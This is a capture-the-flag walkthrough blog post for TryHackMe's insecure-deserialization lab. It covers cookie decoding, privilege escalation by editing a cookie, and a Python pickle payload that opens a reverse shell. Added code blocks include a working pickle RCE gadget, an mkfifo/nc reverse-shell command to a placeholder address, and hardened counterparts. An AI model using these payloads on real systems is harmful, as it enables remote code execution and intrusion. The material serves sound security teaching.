Try Hack Me: OWASP Top 10 Room Day 8 of 10

lightkun_yagami
4 min readJul 21, 2020

This is a FREE room on Try Hack Me (you don’t have to pay for a subscription, just create an account). It contains challenges that teach one OWASP Top 10 vulnerability per day for 10 days in a row. The challenges are:

Day 1: Injection

Day 2: Broken Authentication

Day 3: Sensitive Data Exposure

Day 4: XML External Entity

Day 5: Broken Access Control

Day 6: Security Misconfiguration

Day 7: Cross-site Scripting

Day 8: Insecure Deserialization

Day 9: Components with Known Vulnerabilities

Day 10: Insufficient Logging & Monitoring

Today’s challenge is Day 8: Insecure Deserialization. I blurred the answers so you will have to do the steps yourself to reveal them.

Below are the challenge questions: (I was assigned an IP of 10.10.119.122. Check your assigned IP address, yours will be different from mine).

[Task 26] [Day 8] Question 1: 1st flag (cookie value)

  • Visit http://10.10.166.76 (substitute the IP assigned to your own machine) and create an account. After logging in, right-click on the page and choose “Inspect Element”
(Screenshot: Inspect Element)
  • By default the window that opens lands on the “Inspector” tab. Click on the “Storage” tab, open the Cookies entry for the site and copy the value of the sessionId cookie. The value is base64-encoded, so we have to decode it to retrieve our first flag.
  • Decode it on your Kali machine with this command: echo ‘paste the base64 here in between the single quotes’ | base64 --decode
(Screenshot: decoding the base64 value)
(Screenshot: flag for [Task 26] [Day 8] Question 1, blurred)

[Task 26] [Day 8] Question 2: 2nd flag (admin dashboard)

  • Still in the Storage tab, double-click the value of the userType cookie, change it from “user” to “admin”, hit Enter and refresh the page. The application trusts this client-controlled value as-is, so you land on the admin dashboard, which holds the second flag.
(Screenshot: userType value is “user”)
(Screenshot: userType value changed to “admin”)
(Screenshot: flag for [Task 26] [Day 8] Question 2, blurred)
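The two cookie steps above (decode sessionId, edit userType) are the same thing seen from the server's side: base64 is an encoding, not a protection, and a server that reads authorization out of an unsigned cookie will believe whatever the browser sends. The example below is added here and is not the room's code or the author's commands; the cookie contents, the field names and the server-side secret are constructed for the demo. It reproduces the decode and the tamper in Python, shows the vulnerable "trust the cookie" check, and beside it an HMAC-signed variant that rejects the edited value.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample cookie, not the room's real sessionId value:
# base64 of a small JSON document, like the value copied from the Storage tab.
SAMPLE_COOKIE = base64.b64encode(
    json.dumps({"sessionId": "a1b2c3", "userType": "user"}).encode()
).decode()

# Assumed server-side secret for the hardened variant (never sent to the client).
SECRET = b"change-me-server-side-secret"


def decode_cookie(value: str) -> dict:
    """What `base64 --decode` does, plus parsing the JSON inside."""
    padded = value + "=" * (-len(value) % 4)  # restore padding lost in copy/paste
    return json.loads(base64.b64decode(padded))


def tamper(value: str, field: str, new_value: str) -> str:
    """Reproduce the devtools edit: change one field and re-encode."""
    data = decode_cookie(value)
    data[field] = new_value
    return base64.b64encode(json.dumps(data).encode()).decode()


def is_admin_unsafe(value: str) -> bool:
    """Vulnerable pattern: authorization decided by a client-controlled value."""
    return decode_cookie(value).get("userType") == "admin"


def sign(value: str) -> str:
    """Hardened variant: append an HMAC so any edit to the body is detectable."""
    mac = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"  # '.' never appears in base64, so it is a safe separator


def is_admin_safe(signed: str) -> bool:
    """Verify the MAC before trusting anything inside the cookie."""
    value, _, mac = signed.rpartition(".")
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return False  # tampered or unsigned: treat as an ordinary user
    return decode_cookie(value).get("userType") == "admin"


if __name__ == "__main__":
    print("decoded:", decode_cookie(SAMPLE_COOKIE))
    forged = tamper(SAMPLE_COOKIE, "userType", "admin")
    print("unsafe check accepts forged cookie:", is_admin_unsafe(forged))
    signed = sign(SAMPLE_COOKIE)
    body, _, mac = signed.rpartition(".")
    forged_signed = tamper(body, "userType", "admin") + "." + mac
    print("safe check accepts forged cookie:", is_admin_safe(forged_signed))
```

The signed variant only detects edits; it does not hide the contents, so a flag or anything else secret still must not live in the cookie at all. A server-side session store keyed by a random identifier avoids both problems.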
  • For the final flag, click on “Exchange your vim” and then click “Provide feedback!”
  • Enter any feedback and click “Submit Feedback”
  • Start a netcat listener on your Kali machine. You can choose whichever port but I will be using 4444. Whatever port you choose, the payload built in the next steps has to connect back to that same port.
(Screenshot: netcat listening and waiting for an incoming connection)
  • Create a python file on your Kali machine. I will use rce.py like the room creator did
  • Copy the source code for the payload that spawns the reverse shell from https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3 and paste it into rce.py. Replace “YOUR_TRYHACKME_VPN_IP” with your Kali VPN IP address (the tun0 adapter IP, not eth0; the target can only reach you over the VPN). Then save the file.
(Screenshot: the payload we will use to get a reverse shell)
  • Run the payload by typing python3 rce.py
  • Copy the result from the terminal. The script prints the base64 payload as a Python bytes literal (b'...'), so copy only the data between the single quote marks, without the leading b or the quotes.
  • Back in the Storage tab, paste that data as the value of the “encodedPayload” cookie
  • Refresh the page and look at the netcat listener you set up on your Kali. The server deserializes the cookie, which runs the command inside the payload and connects back to you.
(Screenshot: we now have a reverse shell)
  • Now all that is left is to look for the flag on the box.
(Screenshot: the final flag, blurred)
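What rce.py exploits is that Python's pickle will call any callable named in the data it unpickles. The example below is added here; it is not the gist's rce.py and not the target's code. It shows the same technique end to end: a class whose __reduce__ makes pickle call os.system on load, the base64 wrapping that produces the cookie value (returned as a str, so there is no b'...' wrapper to trim), the kind of pickle.loads call the target must have behind the encodedPayload cookie, and a RestrictedUnpickler that refuses the gadget. The address 10.8.0.1, the port 4444 and the use of nc rather than netcat in the reverse-shell command are assumptions; the harmless Probe gadget stands in for os.system so the demo has no side effects when run.

```python
import base64
import io
import os
import pickle


class PickleRce:
    """Gadget in the style of the room's rce.py: when unpickled, the tuple
    returned by __reduce__ tells pickle to call os.system(command)."""

    def __init__(self, command: str) -> None:
        self.command = command

    def __reduce__(self):
        return (os.system, (self.command,))


def encode_object(obj) -> str:
    """Pickle and base64-encode, giving text that fits in a cookie value."""
    return base64.b64encode(pickle.dumps(obj)).decode()


def build_payload(command: str) -> str:
    """The value to paste into the encodedPayload cookie."""
    return encode_object(PickleRce(command))


def reverse_shell_command(lhost: str, lport: int = 4444) -> str:
    """Classic mkfifo reverse shell; lhost is your tun0 address (assumed 'nc' binary)."""
    return (f"rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | "
            f"nc {lhost} {lport} > /tmp/f")


def vulnerable_loads(cookie: str):
    """What the target does with encodedPayload: unpickle untrusted data.
    The gadget runs inside loads(), before the application sees any object."""
    return pickle.loads(base64.b64decode(cookie))


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened variant: refuse every global except a few harmless builtins."""
    SAFE = {("builtins", n) for n in ("dict", "list", "str", "int", "float", "bool", "set", "tuple")}

    def find_class(self, module, name):
        if (module, name) in self.SAFE:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(cookie: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()


def rejected_by_safe_loads(cookie: str) -> bool:
    """True when the restricted unpickler refuses the payload."""
    try:
        safe_loads(cookie)
    except pickle.UnpicklingError:
        return True
    return False


class Probe:
    """Harmless gadget: os.path.basename instead of os.system, to show that
    loads() calls whatever callable the pickle names."""

    def __reduce__(self):
        return (os.path.basename, ("/flag/pwned",))


def probe_payload() -> str:
    return encode_object(Probe())


if __name__ == "__main__":
    print("cookie value:", build_payload(reverse_shell_command("10.8.0.1")))  # 10.8.0.1 is a placeholder
    print("vulnerable loads ran the probe and returned:", vulnerable_loads(probe_payload()))
    print("safe loads rejects the probe:", rejected_by_safe_loads(probe_payload()))
    print("safe loads still reads plain data:", safe_loads(encode_object({"userType": "user"})))
```

The restricted unpickler is a mitigation, not a fix: the real fix is to never unpickle data that crosses a trust boundary and to use a data-only format such as JSON for cookies, with a signature as in the previous example.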

I am not getting paid by Try Hack Me to say this, but go and sign up for a free account on https://tryhackme.com
